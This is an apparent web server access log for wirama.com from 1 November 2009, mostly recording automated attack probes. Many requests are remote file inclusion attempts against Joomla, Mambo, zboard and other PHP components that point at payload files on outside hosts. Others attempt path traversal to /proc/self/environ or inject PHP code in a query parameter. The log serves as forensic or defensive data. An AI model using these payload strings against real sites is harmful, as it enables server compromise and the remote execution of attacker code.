67.228.191.194 - - [01/Nov/2009:06:32:54 -0800] "GET /logs/access_090501.log/modules/vwar/convert/mvcw_conver.php?step=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
67.228.191.194 - - [01/Nov/2009:06:32:54 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
67.228.191.194 - - [01/Nov/2009:06:32:54 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
200.234.200.85 - - [01/Nov/2009:06:40:56 -0800] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=./../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
200.234.200.85 - - [01/Nov/2009:06:40:57 -0800] "GET /index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=./../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
61.100.181.218 - - [01/Nov/2009:06:47:42 -0800] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.100.181.218 - - [01/Nov/2009:06:47:42 -0800] "GET /logs///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.100.181.218 - - [01/Nov/2009:06:47:42 -0800] "GET /logs/access_090601.log///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
200.234.200.85 - - [01/Nov/2009:06:47:58 -0800] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=./../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
200.234.200.85 - - [01/Nov/2009:06:47:58 -0800] "GET /index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=./../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
61.100.181.218 - - [01/Nov/2009:06:48:01 -0800] "GET /logs/access_090801.log///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
112.78.14.2 - - [01/Nov/2009:06:48:57 -0800] "GET /common/classes/class_HeaderHandler.lib.php?CFG[site][project_path]=http://119.69.199.43/bbs//idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
112.78.14.2 - - [01/Nov/2009:06:48:58 -0800] "GET /logs/access_090401.log/common/classes/class_HeaderHandler.lib.php?CFG[site][project_path]=http://119.69.199.43/bbs//idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
202.88.229.100 - - [01/Nov/2009:06:48:58 -0800] "GET /logs/access_090401.log/errors.php?error=http://www.artofgaming.it/site/rss/copyme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
202.88.229.100 - - [01/Nov/2009:06:48:58 -0800] "GET /errors.php?error=http://www.artofgaming.it/site/rss/copyme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
202.88.229.100 - - [01/Nov/2009:06:48:58 -0800] "GET /logs/errors.php?error=http://www.artofgaming.it/site/rss/copyme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
77.221.130.11 - - [01/Nov/2009:06:54:33 -0800] "GET /logs/access_090731.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.shchd.co.kr/icon/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
77.221.130.11 - - [01/Nov/2009:06:54:35 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.shchd.co.kr/icon/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
77.221.130.11 - - [01/Nov/2009:06:54:35 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.shchd.co.kr/icon/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
67.195.111.57 - - [01/Nov/2009:06:55:09 -0800] "GET /logs/?S=A HTTP/1.0" 200 3413 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.wirama.com"
61.100.181.218 - - [01/Nov/2009:06:59:33 -0800] "GET /logs/access_090331.log//zboard//skin/zero_vote/setup.php?dir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.100.181.218 - - [01/Nov/2009:06:59:33 -0800] "GET /logs//zboard//skin/zero_vote/setup.php?dir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.100.181.218 - - [01/Nov/2009:06:59:33 -0800] "GET /zboard//skin/zero_vote/setup.php?dir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.100.181.218 - - [01/Nov/2009:07:03:18 -0800] "GET /logs/access_090801.log//zboard//skin/zero_vote/setup.php?dir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.100.181.218 - - [01/Nov/2009:07:04:30 -0800] "GET /zboard//skin/zero_vote/setup.php?dir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.100.181.218 - - [01/Nov/2009:07:04:30 -0800] "GET /logs/access_090331.log//zboard//skin/zero_vote/setup.php?dir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.100.181.218 - - [01/Nov/2009:07:04:30 -0800] "GET /logs//zboard//skin/zero_vote/setup.php?dir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.100.181.218 - - [01/Nov/2009:07:08:15 -0800] "GET /logs/access_090801.log//zboard//skin/zero_vote/setup.php?dir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
65.55.107.179 - - [01/Nov/2009:07:17:38 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.107.179 - - [01/Nov/2009:07:18:34 -0800] "GET /logs/?M=A HTTP/1.1" 200 3429 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
222.122.46.179 - - [01/Nov/2009:07:22:33 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.46.179 - - [01/Nov/2009:07:22:33 -0800] "GET /logs/access_090331.log///skin/zero_vote/ask_password.php?dir=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.46.179 - - [01/Nov/2009:07:22:33 -0800] "GET /logs///skin/zero_vote/ask_password.php?dir=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.46.179 - - [01/Nov/2009:07:25:08 -0800] "GET /logs/access_090801.log///skin/zero_vote/ask_password.php?dir=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
202.88.229.100 - - [01/Nov/2009:07:25:14 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.artofgaming.it/site/rss/copyme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
202.88.229.100 - - [01/Nov/2009:07:25:14 -0800] "GET /logs/access_090329.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.artofgaming.it/site/rss/copyme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
202.88.229.100 - - [01/Nov/2009:07:25:14 -0800] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.artofgaming.it/site/rss/copyme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
67.195.111.57 - - [01/Nov/2009:07:25:14 -0800] "GET /logs/?N=A HTTP/1.0" 200 3413 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.wirama.com"
81.12.13.152 - - [01/Nov/2009:07:26:39 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
81.12.13.152 - - [01/Nov/2009:07:26:39 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
81.12.13.152 - - [01/Nov/2009:07:26:39 -0800] "GET /logs/access_090601.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
81.12.13.152 - - [01/Nov/2009:07:27:09 -0800] "GET /logs/access_090901.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
98.129.217.50 - - [01/Nov/2009:07:27:18 -0800] "GET /logs/access_090401.log//?mosConfig_absolute_path=http://ulsanmis.pe.kr/bbs/admin/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
98.129.217.50 - - [01/Nov/2009:07:27:18 -0800] "GET /?mosConfig_absolute_path=http://ulsanmis.pe.kr/bbs/admin/fx29id1.txt?? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "wirama.com"
98.129.217.50 - - [01/Nov/2009:07:27:18 -0800] "GET /logs//?mosConfig_absolute_path=http://ulsanmis.pe.kr/bbs/admin/fx29id1.txt?? HTTP/1.1" 200 3434 "-" "Mozilla/5.0" "wirama.com"
200.62.136.226 - - [01/Nov/2009:07:35:12 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.resortlife.co.kr//uploadImages/1103866579/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
200.62.136.226 - - [01/Nov/2009:07:35:12 -0800] "GET /logs/access_090801.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.resortlife.co.kr//uploadImages/1103866579/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
200.62.136.226 - - [01/Nov/2009:07:35:12 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.resortlife.co.kr//uploadImages/1103866579/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
200.62.136.226 - - [01/Nov/2009:07:35:14 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.resortlife.co.kr//uploadImages/1103866579/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
200.62.136.226 - - [01/Nov/2009:07:35:14 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.resortlife.co.kr//uploadImages/1103866579/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
200.62.136.226 - - [01/Nov/2009:07:35:14 -0800] "GET /logs/access_090801.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.resortlife.co.kr//uploadImages/1103866579/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
200.62.136.226 - - [01/Nov/2009:07:40:16 -0800] "GET /logs/access_090501.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.resortlife.co.kr//uploadImages/1103866579/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
65.55.208.50 - - [01/Nov/2009:07:40:57 -0800] "GET /_private/?S=D HTTP/1.1" 200 675 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
112.78.14.2 - - [01/Nov/2009:07:47:00 -0800] "GET /logs/access_090401.log/common/classes/class_HeaderHandler.lib.php?CFG[site][project_path]=http://119.69.199.43/bbs//idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
112.78.14.2 - - [01/Nov/2009:07:47:01 -0800] "GET /logs/common/classes/class_HeaderHandler.lib.php?CFG[site][project_path]=http://119.69.199.43/bbs//idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
67.228.191.194 - - [01/Nov/2009:08:24:15 -0800] "GET /hpmaker/index.php?p=http://www.epicurians.fr/components/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
67.228.191.194 - - [01/Nov/2009:08:24:15 -0800] "GET /logs/access_090701.log//hpmaker/index.php?p=http://www.epicurians.fr/components/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
67.228.191.194 - - [01/Nov/2009:08:24:15 -0800] "GET /logs//hpmaker/index.php?p=http://www.epicurians.fr/components/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
65.55.207.70 - - [01/Nov/2009:08:41:29 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.207.70 - - [01/Nov/2009:08:42:04 -0800] "GET /?N=A HTTP/1.1" 200 916 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
85.94.33.242 - - [01/Nov/2009:08:54:58 -0800] "GET /logs/access_090701.log/errors.php?error=http://www.dantzigphotography.com//wp-content/plugins/mygallery/myfunctions/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
85.94.33.242 - - [01/Nov/2009:08:54:58 -0800] "GET /errors.php?error=http://www.dantzigphotography.com//wp-content/plugins/mygallery/myfunctions/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
85.94.33.242 - - [01/Nov/2009:08:54:58 -0800] "GET /logs/errors.php?error=http://www.dantzigphotography.com//wp-content/plugins/mygallery/myfunctions/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
85.94.33.242 - - [01/Nov/2009:08:55:04 -0800] "GET /logs/access_090501.log/errors.php?error=http://www.dantzigphotography.com//wp-content/plugins/mygallery/myfunctions/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
193.47.80.37 - - [01/Nov/2009:08:56:04 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.wirama.com"
193.47.80.37 - - [01/Nov/2009:08:56:04 -0800] "GET /logs/ HTTP/1.1" 200 3429 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.wirama.com"
211.191.177.210 - - [01/Nov/2009:08:59:04 -0800] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://appbbs.onmuz.com//bbs/icon/member_image_box/idxx.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "wirama.com"
211.191.177.210 - - [01/Nov/2009:08:59:04 -0800] "GET /logs///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://appbbs.onmuz.com//bbs/icon/member_image_box/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
211.191.177.210 - - [01/Nov/2009:08:59:04 -0800] "GET /logs/access_090601.log///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://appbbs.onmuz.com//bbs/icon/member_image_box/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
211.191.177.210 - - [01/Nov/2009:08:59:25 -0800] "GET /logs/access_090801.log///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://appbbs.onmuz.com//bbs/icon/member_image_box/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
204.3.182.177 - - [01/Nov/2009:08:59:34 -0800] "GET /errors.php?error=http://www.dantzigphotography.com//wp-content/plugins/mygallery/myfunctions/x? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "wirama.com"
204.3.182.177 - - [01/Nov/2009:08:59:34 -0800] "GET /logs/access_090701.log/errors.php?error=http://www.dantzigphotography.com//wp-content/plugins/mygallery/myfunctions/x? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "wirama.com"
204.3.182.177 - - [01/Nov/2009:08:59:34 -0800] "GET /logs/errors.php?error=http://www.dantzigphotography.com//wp-content/plugins/mygallery/myfunctions/x? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "wirama.com"
211.191.177.210 - - [01/Nov/2009:08:59:50 -0800] "GET /logs/access_090401.log///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://appbbs.onmuz.com//bbs/icon/member_image_box/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
211.191.177.210 - - [01/Nov/2009:09:01:03 -0800] "GET /logs/access_090601.log///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://appbbs.onmuz.com//bbs/icon/member_image_box/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
211.191.177.210 - - [01/Nov/2009:09:01:03 -0800] "GET /logs///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://appbbs.onmuz.com//bbs/icon/member_image_box/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
211.191.177.210 - - [01/Nov/2009:09:01:03 -0800] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://appbbs.onmuz.com//bbs/icon/member_image_box/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
211.191.177.210 - - [01/Nov/2009:09:01:30 -0800] "GET /logs/access_090801.log///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://appbbs.onmuz.com//bbs/icon/member_image_box/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
216.139.67.116 - - [01/Nov/2009:09:03:37 -0800] "GET /logs/access_090701.log/errors.php?error=http://www.dantzigphotography.com/wp-content/plugins/mygallery/myfunctions/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
216.139.67.116 - - [01/Nov/2009:09:03:37 -0800] "GET /logs/access_090501.log/errors.php?error=http://www.dantzigphotography.com/wp-content/plugins/mygallery/myfunctions/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
216.139.67.116 - - [01/Nov/2009:09:03:37 -0800] "GET /logs/errors.php?error=http://www.dantzigphotography.com/wp-content/plugins/mygallery/myfunctions/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
216.139.67.116 - - [01/Nov/2009:09:03:37 -0800] "GET /errors.php?error=http://www.dantzigphotography.com/wp-content/plugins/mygallery/myfunctions/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
65.55.106.157 - - [01/Nov/2009:09:07:06 -0800] "GET /tmp/?S=A HTTP/1.1" 200 520 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
66.244.236.249 - - [01/Nov/2009:09:07:15 -0800] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
66.244.236.249 - - [01/Nov/2009:09:07:15 -0800] "GET /logs/access_090601.log///admin/spaw/spaw_control.class.php?spaw_root=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
66.244.236.249 - - [01/Nov/2009:09:07:15 -0800] "GET /logs///admin/spaw/spaw_control.class.php?spaw_root=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
66.244.236.249 - - [01/Nov/2009:09:07:20 -0800] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
66.244.236.249 - - [01/Nov/2009:09:07:20 -0800] "GET /logs///admin/spaw/spaw_control.class.php?spaw_root=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
66.244.236.249 - - [01/Nov/2009:09:07:20 -0800] "GET /logs/access_090601.log///admin/spaw/spaw_control.class.php?spaw_root=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
66.244.236.249 - - [01/Nov/2009:09:07:21 -0800] "GET /logs/access_090401.log///admin/spaw/spaw_control.class.php?spaw_root=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
66.244.236.249 - - [01/Nov/2009:09:07:28 -0800] "GET /logs/access_090401.log///admin/spaw/spaw_control.class.php?spaw_root=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
66.244.236.249 - - [01/Nov/2009:09:07:29 -0800] "GET /logs/access_090901.log///admin/spaw/spaw_control.class.php?spaw_root=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
66.244.236.249 - - [01/Nov/2009:09:07:37 -0800] "GET /logs/access_090901.log///admin/spaw/spaw_control.class.php?spaw_root=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
66.244.236.249 - - [01/Nov/2009:09:07:44 -0800] "GET /logs/access_090301.log///admin/spaw/spaw_control.class.php?spaw_root=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
66.244.236.249 - - [01/Nov/2009:09:08:06 -0800] "GET /logs/access_090701.log///admin/spaw/spaw_control.class.php?spaw_root=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
66.244.236.249 - - [01/Nov/2009:09:08:06 -0800] "GET /logs/access_090329.log///admin/spaw/spaw_control.class.php?spaw_root=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
66.244.236.249 - - [01/Nov/2009:09:08:06 -0800] "GET /logs/access_090731.log///admin/spaw/spaw_control.class.php?spaw_root=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
65.55.208.60 - - [01/Nov/2009:09:13:51 -0800] "GET /_private/?N=A HTTP/1.1" 200 675 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
121.78.112.195 - - [01/Nov/2009:09:16:18 -0800] "GET /logs/access_090731.log//prodler.class.php?sPath=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
121.78.112.195 - - [01/Nov/2009:09:16:18 -0800] "GET /prodler.class.php?sPath=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
121.78.112.195 - - [01/Nov/2009:09:16:18 -0800] "GET /logs//prodler.class.php?sPath=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
213.3.26.176 - - [01/Nov/2009:09:20:43 -0800] "GET /administrator/components/com_competitions/includes/competitions/add.php?GLOBALS[mosConfig_absolute_path]=http://unixstats.org/tools/idxx.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
213.3.26.176 - - [01/Nov/2009:09:20:43 -0800] "GET /logs//administrator/components/com_competitions/includes/competitions/add.php?GLOBALS[mosConfig_absolute_path]=http://unixstats.org/tools/idxx.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
213.3.26.176 - - [01/Nov/2009:09:20:43 -0800] "GET /logs/access_090901.log//administrator/components/com_competitions/includes/competitions/add.php?GLOBALS[mosConfig_absolute_path]=http://unixstats.org/tools/idxx.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
121.78.116.203 - - [01/Nov/2009:09:24:14 -0800] "GET /logs/access_090329.log///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://toilet.fileave.com/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
121.78.116.203 - - [01/Nov/2009:09:24:15 -0800] "GET /logs///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://toilet.fileave.com/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
121.78.116.203 - - [01/Nov/2009:09:24:15 -0800] "GET /logs///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://toilet.fileave.com/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
121.78.116.203 - - [01/Nov/2009:09:24:15 -0800] "GET /logs/access_090329.log///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://toilet.fileave.com/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
121.78.116.203 - - [01/Nov/2009:09:24:15 -0800] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://toilet.fileave.com/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
121.78.116.203 - - [01/Nov/2009:09:24:15 -0800] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://toilet.fileave.com/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
121.78.116.203 - - [01/Nov/2009:09:24:48 -0800] "GET /logs/access_090601.log///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://toilet.fileave.com/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
121.78.116.203 - - [01/Nov/2009:09:24:50 -0800] "GET /logs/access_090601.log///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://toilet.fileave.com/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
58.230.123.88 - - [01/Nov/2009:09:25:29 -0800] "GET /logs/access_090731.log//prodler.class.php?sPath=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
